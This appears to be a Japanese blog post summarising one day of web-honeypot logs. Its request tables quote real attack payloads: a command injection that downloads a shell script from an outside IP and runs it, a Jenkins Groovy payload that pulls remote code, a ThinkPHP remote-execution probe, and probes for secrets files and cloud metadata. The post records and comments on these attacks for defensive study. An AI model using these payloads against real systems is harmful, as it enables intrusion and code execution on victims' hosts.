2019年5月26日 BW-pot観察まとめ

1.トップ画面

f:id:NickShadows:20190527212704p:plain:w500


2.直近1ヶ月折れ線グラフ

f:id:NickShadows:20190527212754p:plain:w500


3.GETリクエスト

no uri Co
1 / 34
2 /Login/ 3
3 /tftpboot/ 3
4 /recordings/ 3
5 /a2billing/admin/Public/PP_error.php 3
6 /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name=%27NsGdMJsD%27,%20root=%27http[:]//185.162.235.211%27)%0a@Grab(group=%27package%27,%20module=%27NsGdMJsD%27,%20version=%271%27)%0aimport%20NsGdMJsD; 3
7 /echo.php 2
8 /MyAdmin/scripts/setup.php 1
9 /phpmyadmin/scripts/setup.php 1
10 /pma/scripts/setup.php 1
11 /myadmin/scripts/setup.php 1
12 /login.cgi?cli=aa%20aa%27;wget%20http[:]//194.147.32.131/sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ 1
13 /w00tw00t.at.blackhats.romanian.anti-sec:) 1
14 /favicon.ico 1
15 /robots.txt 1
16 /.well-known/security.txt 1
17 /sitemap.xml 1
18 /phpMyAdmin/scripts/setup.php 1
19 /manager/html 1
20 /latest/meta-data/ 1
21 /.env 1
22 /TP/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 1
23 /TP/public/index.php 1
24 /ddd.html 1


4.POSTリクエスト

no uri Co
1 /TP/public/index.php?s=captcha 1


5.pypmyadminユーザー

アクセスなし


6.pypmyadminパスワード

アクセスなし


7.wordpressユーザー

アクセスなし


8.wordpressパスワード

アクセスなし


9.tomcatユーザー

no user Co
1 1


10.tomcatパスワード

no pwd Co
1 1


11.直近24時間新着アクセス

no uri request_body
1 /login.cgi?cli=aa%20aa%27;wget%20http[:]//194.147.32.131/sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$
2 /PHPMYADMIN/scripts/setup.php
3 /phpmyadmin/setup.php/index.php
4 /ddd.html


12.まとめ

「/login.cgi」はsatoriのボットネット化?

www.shadan-kun.com

対象のIPアドレスをshodanで調べてみたら、脆弱性がうようよしていた。
21、22、123ポートが空いていたし、ダウンローダサーバーなのかな。